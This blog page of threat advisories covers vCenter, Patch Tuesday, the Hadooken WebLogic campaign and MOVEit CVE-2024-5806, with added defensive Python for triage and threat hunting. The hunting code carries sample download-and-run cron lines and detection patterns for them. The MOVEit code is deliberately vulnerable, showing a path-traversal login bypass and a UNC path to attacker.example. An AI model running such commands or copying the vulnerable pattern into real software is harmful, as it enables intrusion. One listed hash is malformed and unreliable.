by jdpoteet | Sep 23, 2024 | Threat Advisories
Summary
Broadcom has released a security update for VMware vCenter Server to address a critical vulnerability, CVE-2024-38812, that could allow remote code execution (RCE). The same release patches a second vulnerability, CVE-2024-38813, that allows privilege escalation. vCenter Server installations must be updated to the fixed versions immediately.
Risk Score
CVE-ID CVSSv3 Score
CVE-2024-38812 9.8
CVE-2024-38813 7.5
Vulnerability Details
Broadcom issued a security patch for VMware vCenter Server to mitigate the critical vulnerability CVE-2024-38812, a heap overflow in vCenter Server's implementation of the DCE/RPC protocol. A malicious actor with network access to vCenter Server can trigger it by sending a specially crafted network packet; the attack is low-complexity and requires no user interaction, and successful exploitation leads to remote code execution.
Broadcom also patched a privilege escalation vulnerability (CVE-2024-38813) with a CVSS score of 7.5, which could allow an attacker with network access to vCenter Server to escalate privileges to root. Both flaws were discovered by security researchers from Team TZL during the Matrix Cup cybersecurity competition in June 2024.
Affected Products
- vCenter Server versions 7.0 and 8.0
- VMware Cloud Foundation versions 4.x and 5.x
Solution
- vCenter Server 8.0: Fixed in version 8.0 U3b
- vCenter Server 7.0: Fixed in version 7.0 U3s
- VMware Cloud Foundation 5.x: Fixed in 8.0 U3b as an asynchronous patch
- VMware Cloud Foundation 4.x: Fixed in 7.0 U3s as an asynchronous patch
Recommendations
- Update vCenter Server and VMware Cloud Foundation to the latest versions as specified above.
- Monitor vCenter Server for signs of exploitation and allow only trusted network connections to reach vCenter services.
- Strictly control network perimeter access to vSphere management components and interfaces, including storage and network components.
by jdpoteet | Sep 19, 2024 | Threat Advisories
SUMMARY
Microsoft’s September 2024 Patch Tuesday release addresses 79 security vulnerabilities, including three actively exploited zero-day vulnerabilities and one publicly disclosed zero-day. The update also resolves 7 critical issues, involving either remote code execution (RCE) or privilege escalation.
The full report is here:
https://www.bleepingcomputer.com/microsoft-patch-tuesday-reports/Microsoft-Patch-Tuesday-September-2024.html
The number of bugs in each vulnerability category is listed below:
- 30 Elevation of Privilege Vulnerabilities
- 4 Security Feature Bypass Vulnerabilities
- 23 Remote Code Execution Vulnerabilities
- 11 Information Disclosure Vulnerabilities
- 8 Denial of Service Vulnerabilities
- 3 Spoofing Vulnerabilities
Zero-day vulnerabilities fixed: Microsoft classifies a zero-day as a vulnerability that is publicly disclosed or actively exploited before an official fix is available. This release fixes four: three actively exploited and one publicly disclosed.
RISK SCORING
CVE-ID CVSSv3 Score
CVE-2024-38014 7.8
CVE-2024-38217 5.4
CVE-2024-38226 7.3
CVE-2024-43491 9.8
VULNERABILITY DETAILS
The three actively exploited zero-day vulnerabilities patched in this month's updates are:
- CVE-2024-38014 – Windows Installer Elevation of Privilege Vulnerability: This flaw allows attackers to gain SYSTEM privileges on Windows systems. Microsoft hasn’t provided details on how it was used in attacks.
- CVE-2024-38217 – Windows Mark of the Web (MOTW) Security Bypass Vulnerability: Publicly disclosed by Joe Desimone of Elastic Security, this flaw has likely been exploited since 2018. Desimone’s report outlines ‘LNK stomping,’ a technique using specially crafted LNK files to bypass Smart App Control and MOTW security warnings, allowing malicious files to be opened without alerts.
- CVE-2024-38226 – Microsoft Publisher Security Feature Bypass Vulnerability: This vulnerability allows attackers to bypass Office macro policies that block untrusted or malicious files. Microsoft has not revealed the source of this discovery or how it was exploited.
PUBLICLY DISCLOSED ZERO-DAY
CVE-2024-43491 – Microsoft Windows Update Remote Code Execution Vulnerability
This flaw in the servicing stack is labeled remote code execution, but its actual effect is to roll back fixes for older vulnerabilities in certain Windows components. It affects only Windows 10 version 1507 (released in July 2015) and the editions of it still in support, Windows 10 Enterprise 2015 LTSB and Windows 10 IoT Enterprise 2015 LTSB. Microsoft states that although the flaw reintroduces vulnerabilities that had previously been exploited, there is no evidence the regression itself was known or exploited externally before Microsoft found it internally. According to Microsoft's advisory, systems that installed the March 2024 security update (KB5035858) or any later monthly update through August 2024 had previously mitigated flaws reintroduced in optional components such as Active Directory Lightweight Directory Services, Internet Explorer 11, and Windows Media Player.
RECOMMENDATIONS
- Apply security patches to all affected systems.
- CVE-2024-43491 is resolved by installing the September 2024 Servicing Stack Update (KB5043936) first and then the September 2024 Windows security update (KB5043083); both are required, in that order.
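To turn the remediation above into a fleet check, the following added example (not code from the original advisory or from Microsoft) triages one host from the rows an administrator gets with `Get-HotFix | Format-Table Description, HotFixID, InstalledOn` plus the OS build number. It reports whether the host is in the rolled-back state and which of the two September updates it still needs. Assumptions: US-style m/d/yyyy dates in the InstalledOn column, and that any "Security Update" row dated from the March 2024 Patch Tuesday up to (not including) the September 2024 one is among the regressing March-August updates; the page itself names only the March update, KB5035858.

```python
"""Triage helper for CVE-2024-43491 on Windows 10 version 1507 hosts (added example)."""
import re
from dataclasses import dataclass
from datetime import date

AFFECTED_BUILD = 10240           # Windows 10 version 1507 (Enterprise 2015 LTSB, IoT Enterprise 2015 LTSB)
MARCH_2024_LCU = "KB5035858"     # first monthly update that reintroduced the old flaws (named on the page)
SEPT_2024_SSU = "KB5043936"      # September 2024 servicing stack update, goes on first
SEPT_2024_LCU = "KB5043083"      # September 2024 security update, goes on second
# Assumption: every "Security Update" row installed from the March 2024 Patch Tuesday up to
# (not including) the September 2024 one is one of the regressing March-August updates.
ROLLBACK_WINDOW = (date(2024, 3, 12), date(2024, 9, 10))


@dataclass(frozen=True)
class HotFix:
    description: str
    kb: str
    installed_on: date


# One data row of: Get-HotFix | Format-Table Description, HotFixID, InstalledOn
# Assumes US-style m/d/yyyy dates; header and separator rows carry no KB number and are skipped.
_ROW = re.compile(r"^(?P<desc>.+?)\s{2,}(?P<kb>KB\d+)\s+(?P<m>\d{1,2})/(?P<d>\d{1,2})/(?P<y>\d{4})")


def parse_hotfixes(table_text):
    rows = []
    for line in table_text.splitlines():
        m = _ROW.match(line.strip())
        if m:
            rows.append(HotFix(m["desc"].strip(), m["kb"],
                               date(int(m["y"]), int(m["m"]), int(m["d"]))))
    return rows


def _rollback_present(rows):
    lo, hi = ROLLBACK_WINDOW
    return any(r.kb == MARCH_2024_LCU
               or (r.description.startswith("Security Update") and lo <= r.installed_on < hi)
               for r in rows)


def triage(build, rows):
    """Return (status, next_step) for one host."""
    if build != AFFECTED_BUILD:
        return "not-affected", "not a 1507 host; normal September patching applies"
    ids = {r.kb for r in rows}
    if SEPT_2024_SSU in ids and SEPT_2024_LCU in ids:
        return "remediated", "both September updates present"
    if SEPT_2024_LCU in ids:
        # the LCU should not install without its SSU; do not trust this state
        return "inconsistent", f"confirm {SEPT_2024_SSU} is installed, then re-check"
    if not _rollback_present(rows):
        return "not-rolled-back", f"install {SEPT_2024_SSU} then {SEPT_2024_LCU} as routine patching"
    if SEPT_2024_SSU in ids:
        return "ssu-only", f"install {SEPT_2024_LCU} to restore the rolled-back fixes"
    return "exposed", f"install {SEPT_2024_SSU} first, then {SEPT_2024_LCU}"


def triage_host(build, table_text):
    return triage(build, parse_hotfixes(table_text))


# Constructed sample: a 1507 host that took the March update and, so far, only the September SSU.
SAMPLE_HOTFIX_TABLE = """\
Description      HotFixID   InstalledOn
-----------      --------   -----------
Security Update  KB5035858  3/13/2024 12:00:00 AM
Security Update  KB5043936  9/11/2024 12:00:00 AM
"""

if __name__ == "__main__":
    print(triage_host(AFFECTED_BUILD, SAMPLE_HOTFIX_TABLE))
```

Feed it `[System.Environment]::OSVersion.Version.Build` and the `Get-HotFix` table from each 1507 host; the "ssu-only" and "inconsistent" states are the ones that a simple "is KB5043083 installed" query misses.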
by jdpoteet | Sep 16, 2024 | Uncategorized
SUMMARY
A recently identified malware campaign targets Linux environments to deploy crypto-mining and botnet malware. The operation goes after Oracle WebLogic servers to deliver a malware strain called “Hadooken,” as reported by cloud security firm Aqua: “When Hadooken is executed, it installs Tsunami malware and deploys a crypto miner.”
TECHNICAL DETAILS
Oracle WebLogic Server is an enterprise-level Java EE application server, widely used for building, deploying, and managing large-scale distributed applications. It is popular in banking, e-commerce, and critical business systems due to its support for Java, transaction management, and scalability. WebLogic is often targeted in cyberattacks, primarily due to vulnerabilities such as deserialization flaws, improper access controls, and common misconfigurations – examples include weak credentials or exposed admin consoles. These weaknesses can lead to severe risks, including remote code execution (RCE), privilege escalation, and data breaches, especially if systems are not properly patched or secured.
The recent campaign leverages these vulnerabilities and configuration weaknesses to gain an initial foothold and execute arbitrary code on vulnerable WebLogic instances. The attack begins by dropping two nearly identical payloads, one written in Python and the other a shell script, which retrieve the Hadooken malware from a remote server at 89.185.85[.]102 or 185.174.136[.]204.

The shell script version also searches directories that hold SSH data, including user credentials and known-host information, and uses what it finds to attack other servers the host already knows about. This enables lateral movement within the compromised environment, spreading Hadooken across the network and connected systems.
Hadooken itself consists of two primary components: a cryptocurrency miner and a distributed denial-of-service (DDoS) botnet named “Tsunami” (also known as Kaiten). Tsunami has previously targeted Jenkins and WebLogic services, especially in Kubernetes environments. Once deployed, Hadooken ensures persistence by creating cron jobs that run the crypto miner at regular intervals.
To evade detection, Hadooken employs various defense evasion techniques. It uses Base64-encoded payloads and disguises malicious processes by naming them innocuously as “bash” or “java” to blend with legitimate system activity. Additionally, it deletes artifacts and traces of its execution to avoid detection. The IP address 89.185.85[.]102 is associated with a hosting provider in Germany, Aeza International LTD (AS210644). A report from Uptycs in February 2024 linked this IP to the “8220 Gang”, which exploited vulnerabilities in Apache Log4j and Atlassian Confluence Server and Data Center for cryptocurrency mining. The same infrastructure is now implicated in the Hadooken campaign, reflecting a consistent trend in abusing known enterprise vulnerabilities.
INDICATORS OF COMPROMISE (IOCs)
Hashes:
- cdf3fce392df6fbb3448c5d26c8d053e
- 4a12098c3799ce17d6d59df86ed1a5b6
- b9f096559e923787ebb1288c93ce2902
- 9bea7389b633c331e706995ed4b3999c
- 8eef5aa6fa9859c71b55c1039f02d2e6
- c1897ea9457343bd8e73f98a1d85a38f
- 249871cb1c396241c9fcd0fd8f9ad2ae
- 73d96a4316182cd6417bdab86d4df1f
Attacker IPs:
- 89.185.85[.]102
- 185.174.136[.]204
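The behaviours described above (cron persistence, processes renamed to “bash” or “java”, call-backs to the two download servers) and the IOC list lend themselves to a host-side hunt. The following is an added example, not code from the original advisory or from Aqua: the hashes and IPs are the ones listed on this page, while the cron, process and log heuristics are this example's own and the sample data is constructed so it runs offline. On a live host, build the `(pid, comm, exe)` tuples from `/proc/<pid>/comm` and `os.readlink("/proc/<pid>/exe")`, and pass real crontab lines, log lines and file paths.

```python
"""Host-side hunting helpers for the Hadooken tradecraft described above (added example)."""
import hashlib
import os
import re

# MD5 hashes and download-server IPs from the IOC list on this page.
IOC_MD5 = {
    "cdf3fce392df6fbb3448c5d26c8d053e", "4a12098c3799ce17d6d59df86ed1a5b6",
    "b9f096559e923787ebb1288c93ce2902", "9bea7389b633c331e706995ed4b3999c",
    "8eef5aa6fa9859c71b55c1039f02d2e6", "c1897ea9457343bd8e73f98a1d85a38f",
    "249871cb1c396241c9fcd0fd8f9ad2ae",
}
IOC_IPS = {"89.185.85.102", "185.174.136.204"}
SCRATCH_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
MASQUERADE_NAMES = {"bash", "java"}   # the benign-looking names Hadooken gives its processes


def md5_of_bytes(data):
    return hashlib.md5(data).hexdigest()


def match_file_hashes(paths, iocs=IOC_MD5):
    """Paths whose MD5 is a known Hadooken sample; unreadable paths are skipped."""
    hits = []
    for p in paths:
        try:
            with open(p, "rb") as f:
                if md5_of_bytes(f.read()) in iocs:   # fine for dropper-sized files
                    hits.append(p)
        except OSError:
            continue
    return hits


# Cron persistence heuristics: base64-decoded stages, download piped to a shell,
# binaries run from scratch directories, or the known download servers.
_CRON_PATTERNS = [
    re.compile(r"base64\s+(?:-d|--decode)\b"),
    re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b"),
    re.compile(r"(?:^|\s)/(?:tmp|dev/shm|var/tmp)/"),
    re.compile(r"\b(?:" + "|".join(re.escape(ip) for ip in sorted(IOC_IPS)) + r")\b"),
]


def suspicious_cron_lines(lines):
    hits = []
    for line in lines:
        entry = line.strip()
        if not entry or entry.startswith("#"):   # commented-out entries never run
            continue
        if any(p.search(entry) for p in _CRON_PATTERNS):
            hits.append(entry)
    return hits


def masquerading_processes(procs):
    """procs: (pid, comm, exe) tuples, exe being the /proc/<pid>/exe link target.
    Flags 'bash'/'java' that run from a scratch directory, from a deleted binary,
    or whose on-disk binary name differs from the advertised process name."""
    hits = []
    for pid, comm, exe in procs:
        if comm not in MASQUERADE_NAMES:
            continue
        on_disk = os.path.basename(exe.replace(" (deleted)", ""))
        if exe.startswith(SCRATCH_DIRS) or exe.endswith("(deleted)") or on_disk != comm:
            hits.append((pid, comm, exe))
    return hits


# Dotted quads, plain or defanged with [.]
_IP_RE = re.compile(r"\b(\d{1,3}(?:\[?\.\]?\d{1,3}){3})\b")


def ioc_ip_hits(log_lines):
    """Log lines (proxy, firewall, shell history) that mention a Hadooken download server."""
    return [line.strip() for line in log_lines
            if any(raw.replace("[.]", ".") in IOC_IPS for raw in _IP_RE.findall(line))]


# Constructed sample data for an offline run.
SAMPLE_CRON = [
    "0 2 * * * /usr/local/bin/backup.sh",
    "*/15 * * * * echo aGVsbG8= | base64 -d | sh",
    "@reboot /tmp/.hadooken/bash",
    "# 5 * * * * wget -q http://89.185.85.102/c -O- | sh",
]
SAMPLE_PROCS = [
    (4120, "java", "/usr/lib/jvm/java-11-openjdk/bin/java"),
    (4811, "bash", "/usr/bin/bash"),
    (5023, "bash", "/dev/shm/bash"),
    (5177, "java", "/var/tmp/.cache/java (deleted)"),
    (5302, "java", "/usr/bin/xmrig"),
]
SAMPLE_LOGS = [
    "Sep 12 10:01:44 wls01 sshd[2210]: Accepted publickey for deploy from 10.0.3.7 port 51234 ssh2",
    "Sep 12 10:02:09 wls01 squid: CONNECT 89.185.85.102:80 from 10.0.3.21",
    "Sep 12 10:02:10 wls01 squid: CONNECT 185.174.136[.]204:80 from 10.0.3.21",
]
```

The process check is the one worth keeping after this campaign: a miner that calls itself “java” still has to be an executable somewhere, and `/proc/<pid>/exe` names that file even when the sample deleted itself after launch.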
RECOMMENDATIONS
- Ensure that Oracle WebLogic servers are consistently updated with the latest security patches to close known vulnerabilities like deserialization flaws.
- Use strong, unique credentials for all admin and user accounts, and disable unnecessary admin interfaces. Implement multi-factor authentication (MFA) where possible.
- Regularly audit server configurations to identify misconfigurations such as exposed admin consoles and weak credentials. Limit access to sensitive areas like SSH directories.
- Set up intrusion detection systems (IDS) to monitor unusual traffic, especially from known malicious IP addresses, such as those linked to the Hadooken campaign.
- Restrict the privileges of user accounts and processes to minimize the impact of potential malware execution.
- Install and maintain anti-malware tools on all systems to detect and block malicious activities, including crypto miners and botnets like Tsunami.
- Automate the process of identifying and mitigating vulnerabilities using tools such as vulnerability scanners and patch management solutions.
- Segment the network to prevent malware from easily moving laterally between systems. Use firewalls and access control lists (ACLs) to enforce boundaries.
- Maintain comprehensive logging of all system and network activities to detect unusual behaviors, such as unauthorized SSH access or cron job creations.
- Ensure regular backups of critical systems and test recovery plans to minimize data loss in the event of a malware attack or breach.
by jdpoteet | Sep 12, 2024 | Videos/Podcasts
This episode of The Backup Wrap-up explores the vital role of tabletop exercises in cybersecurity preparedness. Dr. Mike Saylor, CEO of Blackswan Cybersecurity, offers an in-depth look at how to effectively plan and conduct these exercises. We discuss why these simulations are crucial for organizations of any size and how they can significantly enhance incident response capabilities.
Tune in to learn how to choose appropriate scenarios, engage key stakeholders, and foster a constructive learning environment. This podcast also highlights common mistakes to avoid and emphasizes the need for regular practice. Whether you’re just starting with tabletop exercises or aiming to refine your current approach, this episode delivers practical advice to boost your organization’s cyber resilience. Don’t miss out on this chance to elevate your incident response strategy!
by jdpoteet | Sep 12, 2024 | News, Blogs
Critical MOVEit Transfer Flaw (CVE-2024-5806)
Summary
Threat actors are swiftly attempting to exploit a new and critical authentication bypass vulnerability in Progress MOVEit Transfer. MOVEit Transfer is a managed file transfer (MFT) solution used for secure file exchange between business partners and customers over the SFTP, SCP, and HTTP protocols. The newly identified flaw (CVE-2024-5806) enables attackers to bypass authentication in the SFTP module, which handles file transfers over SSH.
Threat intelligence: exploits actively observed
Technical Details
CVE-2024-5806, with a CVSS score of 9.1 (Critical), is an authentication bypass affecting several versions of Progress MOVEit Transfer: 2023.0.0 before 2023.0.11, 2023.1.0 before 2023.1.6, and 2024.0.0 before 2024.0.2. According to Progress's advisory, “an improper authentication vulnerability in the MOVEit Transfer SFTP module can lead to authentication bypass”.
Shortly after disclosure of the bulletin on CVE-2024-5806, Shadowserver Foundation reported observing attempts to exploit the vulnerability, indicating that hackers are already targeting exposed endpoints. Censys network scans revealed that approximately 2,700 MOVEit Transfer instances were accessible on the internet, predominantly located in the US, UK, Germany, Canada, and the Netherlands. The exact proportion of these instances that have not yet applied the necessary security updates or mitigations remains unknown.

[Figure: Internet-exposed MOVEit Transfer instances. Source: Censys]
The exploitation attempts reported by Shadowserver followed the publication of technical details by the offensive security company watchTowr, whose analysis covers the vulnerability, its exploitation methods, and indicators of compromise that defenders should look for in their logs. watchTowr also explained how attackers could manipulate SSH public key paths to force the server to authenticate against attacker-controlled paths, potentially exposing Net-NTLMv2 hashes. Proof-of-concept exploit code for CVE-2024-5806 is now publicly available from watchTowr and from security researcher Sina Kheirkhah. Given the availability of this information, organizations must promptly apply the security updates and mitigations, as attack attempts are expected to increase.
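The bug class behind the key-path manipulation above is easiest to see in a stripped-down SFTP public-key lookup, shown here in a vulnerable and a hardened form. This is an added example, not Progress's code and not watchTowr's exploit; the class and function names, the on-disk layout (one directory per user holding `<name>.pub` files) and the sample keys are assumptions. The vulnerable store lets a path-like value from the unauthenticated client decide which file the reference key is read from, so a traversal path points the comparison at a key the attacker uploaded, and on Windows a UNC path makes the server's SMB client reach out to the attacker's host. The hardened store never lets client input name a file: it validates the user name as a plain identifier, keeps the resolved directory under the key root, and compares the offered key against the user's own stored keys.

```python
"""Vulnerable and hardened public-key lookup for an SFTP service (added example)."""
import os
import re
import tempfile

# Assumed layout: <root>/<user>/<name>.pub, one OpenSSH "type base64 comment" line per file.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]{0,63}$")


def looks_like_path(value):
    """True for a value that a user or key field should never carry: a UNC path,
    a drive letter, an absolute path or a traversal component. Useful on auth logs."""
    parts = re.split(r"[\\/]", value)
    return (value.startswith(("\\\\", "//", "/"))
            or re.match(r"^[A-Za-z]:[\\/]", value) is not None
            or ".." in parts)


def _read_key(path):
    with open(path, encoding="utf-8") as f:
        return f.read().strip()


class VulnerableKeyStore:
    """Lets the client choose which file the reference key is read from."""

    def __init__(self, root):
        self.root = root

    def resolve(self, user, client_value):
        # os.path.join drops everything before an absolute component (and, on Windows,
        # before a drive or UNC path), so the client controls where the server reads from.
        return os.path.join(self.root, user, client_value)

    def authenticate(self, user, client_value, client_key):
        try:
            return _read_key(self.resolve(user, client_value)) == client_key.strip()
        except OSError:
            return False


class HardenedKeyStore:
    """The client never names a file: the server enumerates the user's own keys."""

    def __init__(self, root):
        self.root = os.path.realpath(root)

    def authorized_keys(self, user):
        if not SAFE_NAME.match(user):
            raise ValueError("user name is not a plain identifier")
        user_dir = os.path.realpath(os.path.join(self.root, user))
        if os.path.commonpath([self.root, user_dir]) != self.root:
            raise ValueError("user directory escapes the key root")
        keys = set()
        if os.path.isdir(user_dir):
            for name in os.listdir(user_dir):
                if name.endswith(".pub"):
                    keys.add(_read_key(os.path.join(user_dir, name)))
        return keys

    def authenticate(self, user, client_key):
        try:
            return client_key.strip() in self.authorized_keys(user)
        except ValueError:
            return False


# Constructed sample keys (not real key material).
ALICE_KEY = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIALICEALICEALICEALICEALICEALICEALICEALICE alice@corp"
ATTACKER_KEY = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEVILEVILEVILEVILEVILEVILEVILEVILEVILEVIL attacker"


def build_fixture(base):
    """alice's key under the key root; the attacker's key in an upload area they can write to."""
    keys_root = os.path.join(base, "keys")
    os.makedirs(os.path.join(keys_root, "alice"))
    os.makedirs(os.path.join(base, "uploads", "anon"))
    with open(os.path.join(keys_root, "alice", "id.pub"), "w") as f:
        f.write(ALICE_KEY + "\n")
    with open(os.path.join(base, "uploads", "anon", "evil.pub"), "w") as f:
        f.write(ATTACKER_KEY + "\n")
    return keys_root


def run_demo():
    with tempfile.TemporaryDirectory() as base:
        keys_root = build_fixture(base)
        vuln, hard = VulnerableKeyStore(keys_root), HardenedKeyStore(keys_root)
        traversal = os.path.join("..", "..", "uploads", "anon", "evil.pub")
        return {
            "vuln_legit": vuln.authenticate("alice", "id.pub", ALICE_KEY),
            "vuln_bypass": vuln.authenticate("alice", traversal, ATTACKER_KEY),  # logs in as alice
            "vuln_forced_auth": vuln.resolve("alice", r"\\attacker.example\share\x.pub"),
            "hard_legit": hard.authenticate("alice", ALICE_KEY),
            "hard_bypass": hard.authenticate("alice", ATTACKER_KEY),
            "hard_bad_user": hard.authenticate("../uploads/anon", ATTACKER_KEY),
        }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name:18} {result}")
```

`vuln_forced_auth` only shows the path the vulnerable resolver would hand to the file API; on Windows that is the UNC path itself, and opening it is what triggers the outbound SMB authentication the text refers to. `looks_like_path` is the check to run over the user and key fields in SFTP authentication logs when hunting for attempts.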
Progress issued fixes in MOVEit Transfer versions 2023.0.11, 2023.1.6, and 2024.0.2, available on the Progress Community portal. Customers without an active maintenance agreement should contact the Renewals team or their Progress partner representative to resolve the issue. MOVEit Cloud customers are not required to take any action, as patches have already been automatically deployed.
Progress also released a security bulletin for a similar authentication bypass, CVE-2024-5805, affecting MOVEit Gateway 2024.0.0. MOVEit is extensively used in enterprise environments, making it a prime target. This is especially concerning given that the Clop ransomware group exploited a MOVEit Transfer zero-day (CVE-2023-34362) last year to breach and extort thousands of organizations.
Recommendations
- Immediately update MOVEit Transfer to the latest versions (2023.0.11, 2023.1.6, or 2024.0.2) as provided on the Progress Community portal.
- If you do not have a current maintenance agreement, contact the Renewals team or your Progress partner representative to obtain the necessary updates.
- Use the technical details provided by watchTowr to identify indicators of compromise and monitor logs for signs of exploitation attempts.
- Following Progress's guidance for the related issue in a third-party component, block Remote Desktop Protocol (RDP) access to MOVEit Transfer servers and restrict their outbound connections to known, trusted endpoints.
- Regularly check for updates and advisories from Progress and other security sources to stay informed about any new vulnerabilities or recommended actions.
- MOVEit Cloud Customers – No action is required, as patches are automatically deployed.